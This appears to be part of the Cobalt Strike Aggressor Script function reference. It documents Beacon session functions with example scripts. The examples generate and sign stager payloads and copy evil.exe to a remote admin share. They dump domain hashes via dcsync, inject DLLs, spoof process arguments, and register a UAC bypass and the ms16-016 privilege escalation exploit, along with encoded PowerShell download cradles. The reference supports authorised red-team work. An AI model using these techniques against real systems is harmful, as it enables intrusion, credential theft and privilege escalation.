User Guide - Part 4 (Functions 1-3)

Functions

This is a list of Aggressor Script’s functions 1-3

-isactive

Check if a session is active or not. A session is considered active if (a) it has not acknowledged an exit message AND (b) it is not disconnected from a parent Beacon.

Arguments

$1 - Beacon/Session ID

Example

command active {
   local('$bid');
   foreach $bid (beacon_ids()) {
      if (-isactive $bid) {
         println("$bid is active!");
      }
   }
}

-isadmin

Check if a session has admin rights

Arguments

$1 - Beacon/Session ID

Example

command admin_sessions {
   foreach $session (beacons()) {
      if (-isadmin $session['id']) {
         println($session);
      }
   }
}

-isbeacon

Check if a session is a Beacon or not.

Arguments

$1 - Beacon/Session ID

Example

command beacons {
   foreach $session (beacons()) {
      if (-isbeacon $session['id']) {
         println($session);
      }
   }
}

-isssh

Check if a session is an SSH session or not.

Arguments

$1 - Beacon/Session ID

Example

command ssh_sessions {
   foreach $session (beacons()) {
      if (-isssh $session['id']) {
         println($session);
      }
   }
}

-hasbootstraphint

Check if a byte array has the x86 or x64 bootstrap hint. Use this function to determine if it’s safe to use an artifact that passes GetProcAddress/GetModuleHandleA pointers to this payload.

Arguments

$1 - byte array with a payload or shellcode.

See also

&payload_bootstrap_hint

-is64

Check if a session is on an x64 system or not (Beacon only).

Arguments

$1 - Beacon/Session ID

Example

command x64 {
   foreach $session (beacons()) {
      if (-is64 $session['id']) {
         println($session);
      }
   }
}

action

Post a public action message to the event log. This is similar to the /me command.

Arguments

$1 - the message

Example

action("dances!");

addTab

create a tab to display a GUI object.

Arguments

$1 - the title of the tab

$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent.

$3 - a tooltip to display when a user hovers over this tab.

Example

$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");

addVisualization

Register a visualization with Cobalt Strike.

Arguments

$1 - the name of the visualization

$2 - a javax.swing.JComponent object

Example

$label = [new javax.swing.JLabel: "Hello World!"];
addVisualization("Hello World", $label);

See also

&showVisualization

add_to_clipboard

Add text to the clipboard and notify the user.

Arguments

$1 - the text to add to the clipboard

Example

add_to_clipboard("Paste me you fool!");

alias

Creates an alias command in the Beacon console

Arguments

$1 - the alias name to bind to

$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.

Example

alias("foo", {
   btask($1, "foo!");
});

alias_clear

Removes an alias command (and restores the default functionality, if any existed)

Arguments

$1 - the alias name to remove

Example

alias_clear("foo");

applications

Returns a list of application information in Cobalt Strike’s data model. These applications are results from the System Profiler.

Returns

An array of dictionary objects with information about each application.

Example

printAll(applications());

archives

Returns a massive list of archived information about your activity from Cobalt Strike’s data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike’s reports.

Returns

An array of dictionary objects with information about your team’s activity.

Example

foreach $index => $entry (archives()) {
   println("\c3( $+ $index $+ )\o $entry");
}

artifact

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead.

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - deprecated; this parameter no longer has any meaning.

$4 - x86|x64 - the architecture of the generated stager

Type         Description
dll          an x86 DLL
dllx64       an x64 DLL
exe          a plain executable
powershell   a powershell script
python       a python script
svcexe       a service executable
vbscript     a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact("my listener", "exe");

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_general

Generates a payload artifact from arbitrary shellcode.

Arguments

$1 - the shellcode

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload

Type         Description
dll          a DLL
exe          a plain executable
powershell   a powershell script
python       a python script
svcexe       a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified as $3.

artifact_payload

Generates a stageless payload artifact (exe, dll) from a Cobalt Strike listener name

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

Type         Description
dll          a DLL
exe          a plain executable
powershell   a powershell script
python       a python script
raw          raw payload stage
svcexe       a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified as $3.

Example

$data = artifact_payload("my listener", "exe", "x86");

artifact_sign

Sign an EXE or DLL file

Arguments

$1 - the contents of the EXE or DLL file to sign

Notes

  • This function requires that a code-signing certificate is specified in this server’s Malleable C2 profile. If no code-signing certificate is configured, this function will return $1 with no changes.
  • DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.

Returns

A scalar containing the signed artifact.

Example

# generate an artifact!
$data = artifact("my listener", "exe");

# sign it.
$data = artifact_sign($data);

# save it
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_stageless

DEPRECATED This function is deprecated in Cobalt Strike 4.0.

Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener

Arguments

$1 - the listener name (must be local to this team server)

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - proxy configuration string

$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.

Type         Description
dll          an x86 DLL
dllx64       an x64 DLL
exe          a plain executable
powershell   a powershell script
python       a python script
raw          raw payload stage
svcexe       a service executable

Notes

  • This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
  • The proxy configuration string is the same string you would use with Attacks → Packages → Windows Executable (S). *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:pass@host:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior. Custom dialogs may use &drow_proxyserver to set this.
  • This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listeners with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
  • Note: while the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload, this function will only populate the script with the architecture specified as $3.

Example

sub ready {
   local('$handle');
   $handle = openf(">out.exe");
   writeb($handle, $1);
   closef($handle);
}

artifact_stageless("my listener", "exe", "x86", "", &ready);

artifact_stager

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated stager

Type         Description
dll          a DLL
exe          a plain executable
powershell   a powershell script
python       a python script
raw          the raw file
svcexe       a service executable
vbscript     a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact_stager("my listener", "exe", "x86");
 
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

barch

Returns the architecture of your Beacon session (e.g., x86 or x64)

Arguments

$1 - the id for the beacon to pull metadata for

Note

If the architecture is unknown (e.g., a DNS Beacon that hasn’t sent metadata yet), this function will return x86.

Example

println("Arch is: " . barch($1));

bargue_add

This function adds an option to Beacon’s list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

$3 - the fake arguments to use when the specified command is run.

Notes

  • The process match is exact. If Beacon tries to launch “net.exe”, it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
  • x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
  • The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.

Example

# spoof cmd.exe arguments.
bargue_add($1, "%COMSPEC%", "/K \"cd c:\\windows\\temp & startupdatenow.bat\"");

# spoof net arguments
bargue_add($1, "net", "user guest /active:no");

bargue_list

List the commands + fake arguments Beacon will spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bargue_list($1);

bargue_remove

This function removes an option to Beacon’s list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

Example

# don't spoof cmd.exe
bargue_remove($1, "%COMSPEC%");

base64_decode

Unwrap a base64-encoded string

Arguments

$1 - the string to decode

Returns

The argument processed by a base64 decoder

Example

println(base64_decode(base64_encode("this is a test")));

base64_encode

Base64 encode a string

Arguments

$1 - the string to encode

Returns

The argument processed by a base64 encoder

Example

println(base64_encode("this is a test"));

bblockdlls

Launch child processes with a binary signature policy that blocks non-Microsoft DLLs from loading in the process space.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - true or false; block non-Microsoft DLLs in child process

Note

This attribute is available in Windows 10 only.

Example

on beacon_initial {
   binput($1, "blockdlls start");
   bblockdlls($1, true);
}

bbrowser

Generate the beacon browser GUI component. Shows only Beacons.

Returns

The beacon browser GUI object (a javax.swing.JComponent )

Example

addVisualization("Beacon Browser", bbrowser());

See also

&showVisualization

bbrowserpivot

Start a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the browser pivot agent into.

$3 - the architecture of the target PID (x86|x64)

Example

bbrowserpivot($1, 1234, "x86");

bbrowserpivot_stop

Stop a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bbrowserpivot_stop($1);

bbypassuac

REMOVED Removed in Cobalt Strike 4.0.

bcancel

Cancel a file download

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to cancel or a wildcard.

Example

item "&Cancel Downloads" {
   bcancel($1, "*");
}

bcd

Ask a Beacon to change its current working directory.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to change to.

Example

# create a command to change to the user's home directory
alias home {
   $home = "c:\\users\\" . binfo($1, "user");
   bcd($1, $home);
}

bcheckin

Ask a Beacon to checkin. This is basically a no-op for Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Checkin" {
   binput($1, "checkin");
   bcheckin($1);
}

bclear

This is the “oops” command. It clears the queued tasks for the specified beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclear($1);

bconnect

Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to connect to

$3 - [optional] the port to use. Default profile port is used otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

bconnect($1, "DC");

bcovertvpn

Ask Beacon to deploy a Covert VPN client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the Covert VPN interface to deploy

$3 - the IP address of the interface [on target] to bridge into

$4 - [optional] the MAC address of the Covert VPN interface

Example

bcovertvpn($1, "phear0", "172.16.48.18");

bcp

Ask Beacon to copy a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to copy

$3 - the destination

Example

bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");

bdata

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(bdata("1234"));

bdcsync

Use mimikatz’s dcsync command to pull a user’s password hash from a domain controller. This function requires a domain administrator trust relationship.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - fully qualified name of the domain

$3 - DOMAIN\user to pull hashes for (optional)

$4 - the PID to inject the dcsync command into or $null

$5 - the architecture of the target PID (x86|x64) or $null

Note

If $3 is left out, dcsync will dump all domain hashes.

Examples

Spawn a temporary process

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab");

Inject into the specified process

# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");
 
# dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");

bdesktop

Start a VNC session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Desktop (VNC)" {
   bdesktop($1); 
}

bdllinject

Inject a Reflective DLL into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the DLL into

$3 - the local path to the Reflective DLL

Example

bdllinject($1, 1234, script_resource("test.dll"));

bdllload

Call LoadLibrary() in a remote process with the specified DLL.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target process PID

$3 - the on-target path to a DLL

Note

The DLL must be the same architecture as the target process.

Example

bdllload($1, 1234, "c:\\windows\\mystuff.dll");

bdllspawn

Spawn a Reflective DLL as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the Reflective DLL

$3 - a parameter to pass to the DLL

$4 - a short description of this post exploitation job (shows up in jobs output)

$5 - how long to block and wait for output (specified in milliseconds)

$6 - true/false; use impersonated token when running this post-ex job?

Notes

  • This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
  • A well-behaved Reflective DLL follows these rules:
    • Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
    • Prints messages to STDOUT
    • Calls fflush(stdout) to flush STDOUT
    • Calls ExitProcess(0) when done. This kills the process that was spawned to host the capability.

Example (ReflectiveDll.c)

This example is based on Stephen Fewer’s Reflective DLL Injection Project:

#include <windows.h>
#include <stdio.h>
#include "ReflectiveLoader.h"

/* hAppInstance is defined in ReflectiveLoader.c (Stephen Fewer's project);
   it holds the DLL's own HINSTANCE so DLL_QUERY_HMODULE can return it. */
extern HINSTANCE hAppInstance;

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
   BOOL bReturnValue = TRUE;
   switch( dwReason ) {
      case DLL_QUERY_HMODULE:
         if( lpReserved != NULL )
            *(HMODULE *)lpReserved = hAppInstance;
         break;
      case DLL_PROCESS_ATTACH:
         hAppInstance = hinstDLL;

         /* print some output to the operator; lpReserved carries the
            parameter passed by bdllspawn (or NULL if none was given) */
         if (lpReserved != NULL) {
            printf("Hello from test.dll. Parameter is '%s'\n", (char *)lpReserved);
         }
         else {
            printf("Hello from test.dll. There is no parameter\n");
         }

         /* flush STDOUT so Beacon can collect the output */
         fflush(stdout);

         /* we're done, so let's exit the host process */
         ExitProcess(0);
         break;
      case DLL_PROCESS_DETACH:
      case DLL_THREAD_ATTACH:
      case DLL_THREAD_DETACH:
         break;
   }
   return bReturnValue;
}

Example (Aggressor Script)

alias hello {
   bdllspawn($1, script_resource("reflective_dll.dll"), $2, 
   "test dll", 5000, false);
}

bdownload

Ask a Beacon to download a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to request

Example

bdownload($1, "c:\\sysprep.inf");

bdrives

Ask Beacon to list the drives on the compromised system

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Drives" {
   binput($1, "drives");
   bdrives($1);
}

beacon_command_describe

Describe a Beacon command.

Returns

A string description of the Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_describe("ls"));

beacon_command_detail

Get the help information for a Beacon command.

Returns

A string with helpful information about a Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_detail("ls"));

beacon_command_register

Register help information for a Beacon command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

# $0 is the full command line; skip the leading "echo " to get the arguments
alias echo {
   blog($1, "You typed: " . substr($0, 5));
}

beacon_command_register(
   "echo", 
   "echo text to beacon log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the beacon console");

beacon_commands

Get a list of Beacon commands.

Returns

An array of Beacon commands.

Example

printAll(beacon_commands());

beacon_data

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(beacon_data("1234"));

beacon_elevator_describe

Describe a Beacon command elevator exploit

Returns

A string description of the Beacon command elevator

Arguments

$1 - the exploit

Example

println(beacon_elevator_describe("uac-token-duplication"));

See also

&beacon_elevator_register, &belevate_command

beacon_elevator_register

Register a Beacon command elevator with Cobalt Strike. This adds an option to the runasadmin command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 the command and arguments)

Example

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
   local('$handle $script $oneliner $command');

   # acknowledge this command
   btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

   # read in the script
   $handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
   $script = readb($handle, -1);
   closef($handle);

   # host the script in Beacon
   $oneliner = beacon_host_script($1, $script);

   # base64 encode the command
   $command  = transform($2, "powershell-base64");

   # run the specified command via this exploit.
   bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}

beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);

See also

&beacon_elevator_describe, &belevate_command

beacon_elevators

Get a list of command elevator exploits registered with Cobalt Strike.

Returns

An array of Beacon command elevators

Example

printAll(beacon_elevators());

See also

&beacon_elevator_describe, &belevate_command

beacon_execute_job

Run a command and report its output to the user.

Arguments

$1 - the Beacon ID

$2 - the command to run (environment variables are resolved)

$3 - the command arguments (environment variables are not resolved).

$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)

Notes

  • The strings $2 and $3 are combined as-is into a command line. Make sure you begin $3 with a space!
  • This is the mechanism Cobalt Strike uses for its shell and powershell commands.

Example

alias shell {
   local('$args');
   $args = substr($0, 6);
   btask($1, "Tasked beacon to run: $args", "T1059");
   beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}

beacon_exploit_describe

Describe a Beacon exploit

Returns

A string description of the Beacon exploit

Arguments

$1 - the exploit

Example

println(beacon_exploit_describe("ms14-058"));

See also

&beacon_exploit_register, &belevate

beacon_exploit_register

Register a Beacon privilege escalation exploit with Cobalt Strike. This adds an option to the elevate command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)

Example

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb

sub ms16_016_exploit {
   local('$stager');
   
   # check if we're on an x64 system and error out.
   if (-is64 $1) {
      berror($1, "ms16-016 exploit is x86 only");
      return;
   }

   # acknowledge this command
   btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

   # generate our shellcode
   $stager = payload($2, "x86");

   # spawn a Beacon post-ex job with the exploit DLL
   bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

   # link to our payload if it's a TCP or SMB Beacon
   beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);

See also

&beacon_exploit_describe, &belevate

beacon_exploits

Get a list of privilege escalation exploits registered with Cobalt Strike.

Returns

An array of Beacon exploits.

Example

printAll(beacon_exploits());

See also

&beacon_exploit_describe, &belevate

beacon_host_imported_script

Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.

Arguments

$1 - the id of the Beacon to host this script with.

Returns

A short PowerShell script that downloads and evaluates the previously imported script when run. How this one-liner is used is up to you!

Example

alias powershell {
   local('$args $cradle $runme $cmd');
   
   # $0 is the entire command with no parsing.
   $args   = substr($0, 11);
   
   # generate the download cradle (if one exists) for an imported PowerShell script
   $cradle = beacon_host_imported_script($1);
   
   # encode our download cradle AND cmdlet+args we want to run
   $runme  = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
   
   # Build up our entire command line.
   $cmd    = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
   
   # task Beacon to run all of this.
   btask($1, "Tasked beacon to run: $args", "T1086");
   beacon_execute_job($1, "powershell", $cmd, 1);
}

beacon_host_script

Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.

Arguments

$1 - the id of the Beacon to host this script with.

$2 - the script data to host.

Returns

A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!

Example

alias test {
   local('$script $hosted');
   $script = "2 + 2";
   $hosted = beacon_host_script($1, $script);
   
   binput($1, "powerpick $hosted");
   bpowerpick($1, $hosted);
}

beacon_ids

Get the IDs of all Beacons calling back to this Cobalt Strike team server.

Returns

An array of beacon IDs

Example

foreach $bid (beacon_ids()) {
   println("Bid: $bid");
}

beacon_info

Get information from a Beacon session’s metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . beacon_info("1234", "user"));
println("PID  is: " . beacon_info("1234", "pid"));

beacon_inline_execute

Execute a Beacon Object File

Arguments

$1 - the id for the Beacon

$2 - a string containing the BOF file

$3 - the entry point to call

$4 - packed arguments to pass to the BOF file

Note

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

Example (hello.c)

/*
* Compile with:
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
*/

#include "windows.h"
#include "stdio.h"
#include "tlhelp32.h"
#include "beacon.h"

void demo(char * args, int length) {
   datap  parser;
   char * str_arg;
   int    num_arg;
   
   BeaconDataParse(&parser, args, length);
   str_arg = BeaconDataExtract(&parser, NULL);
   num_arg = BeaconDataInt(&parser);
   
   BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}

Example (hello.cna)

alias hello {
   local('$barch $handle $data $args');

   # figure out the arch of this session
   $barch  = barch($1);

   # read in the right BOF file
   $handle = openf(script_resource("hello. $+ $barch $+ .o"));
   $data   = readb($handle, -1);
   closef($handle);

   # pack our arguments
   $args   = bof_pack($1, "zi", "Hello World", 1234);

   # announce what we're doing
   btask($1, "Running Hello BOF");
   
   # execute it.
   beacon_inline_execute($1, $data, "demo", $args);
}

See Also

&bof_pack

beacon_link

This function links to an SMB or TCP listener. If the specified listener is not an SMB or TCP listener, this function does nothing.

Arguments

$1 - the id of the beacon to link through

$2 - the target host to link to. Use $null for localhost.

$3 - the listener to link

Example

# smartlink [target] [listener name]
alias smartlink {
   beacon_link($1, $2, $3);
}

beacon_remote_exec_method_describe

Describe a Beacon remote execute method

Returns

A string description of the Beacon remote execute method.

Arguments

$1 - the method

Example

println(beacon_remote_exec_method_describe("wmi"));

See also

&beacon_remote_exec_method_register, &bremote_exec

beacon_remote_exec_method_register

Register a Beacon remote execute method with Cobalt Strike. This adds an option for use with the remote-exec command.

Arguments

$1 - the method short name

$2 - a description of the method

$3 - the function that implements the method ($1 is the Beacon ID, $2 is the target, $3 is the command+args)

See also

&beacon_remote_exec_method_describe, &bremote_exec

beacon_remote_exec_methods

Get a list of remote execute methods registered with Cobalt Strike.

Returns

An array of remote exec modules.

Example

printAll(beacon_remote_exec_methods());

See also

&beacon_remote_exec_method_describe, &bremote_exec

beacon_remote_exploit_arch

Get the arch info for this Beacon lateral movement option.

Arguments

$1 - the exploit

Returns

x86 or x64

Example

println(beacon_remote_exploit_arch("psexec"));

See also

&beacon_remote_exploit_register, &bjump

beacon_remote_exploit_describe

Describe a Beacon lateral movement option.

Returns

A string description of the Beacon lateral movement option.

Arguments

$1 - the exploit

Example

println(beacon_remote_exploit_describe("psexec"));

See also

&beacon_remote_exploit_register, &bjump

beacon_remote_exploit_register

Register a Beacon lateral movement option with Cobalt Strike. This function extends the jump command.

Arguments

$1 - the exploit short name

$2 - the arch associated with this attack (e.g., x86, x64)

$3 - a description of the exploit

$4 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the listener)

See also

&beacon_remote_exploit_describe, &bjump

beacon_remote_exploits

Get a list of lateral movement options registered with Cobalt Strike.

Returns

An array of lateral movement option names.

Example

printAll(beacon_remote_exploits());
